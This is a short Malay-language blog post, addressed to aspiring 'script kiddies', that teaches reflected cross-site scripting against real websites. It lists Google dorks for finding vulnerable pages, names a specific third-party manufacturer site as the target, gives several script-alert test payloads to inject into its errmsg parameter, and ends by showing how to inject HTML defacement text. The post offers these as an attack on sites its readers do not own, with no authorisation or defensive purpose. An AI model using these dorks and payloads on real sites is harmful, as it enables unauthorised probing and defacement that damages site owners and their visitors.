salam :D
pagi nie Adios nk post something tok kowg yg script kiddies :D
hehe...jgn marah...
korang nk jadi hacker kan?
Adios bley aja...
yg nie paling basic la...ok?
1) Cari target di google, gunakan dork ini:
inurl:/gen_confirm.php?errmsg=
inurl:"search.php?q="
2) anggaplah target kita kali ini adalah:
http://bangladeshmanufacturers.com/gen_confirm.phperrmsg=No+such+product+catalog+exists+or+disabled+by+admin
kita test site diatas, apakah vurn terhadap XSS atau tidak, caranya dengan memasukan salah satu script ini, setelah /gen_confirm.php?errmsg=
<script>alert("XSS")</script>;
<script>alert("XSS");</script>
<script>alert("/XSS"/)</script>
')alert('XSS');
");alert('XSS');
<script type=text/javascript>alert("XSS")</script>
<script>var var = 1; alert(var)</script>
<script>alert(String.fromCharCode(115, 112, 121, 114, 111))</script>
dan sebagai contoh:
http://bangladeshmanufacturers.com/gen_confirm.php?errmsg=<script>alert("XSS")</script>;
apabila script ini dijalankan dan memunculkan pop-up window yang berisi
"XSS", maka dapat dipastikan site ini vurn terhadap XSS.
3)Dan langkah terakhir anda dapat berkreasi sesuka hati,
anda dapat memasukkan gambar, teks, dll.
Caranya, masukkan kode html setelah /gen_confirm.php?errmsg=
dan hasilnya akan seperti ini
http://bangladeshmanufacturers.com/gen_confirm.php?errmsg=
<marquee><h1><center>Tahniah Anda Berjaya Melakukan Serangan XSS :D</center><h1></marquee>
No comments:
Post a Comment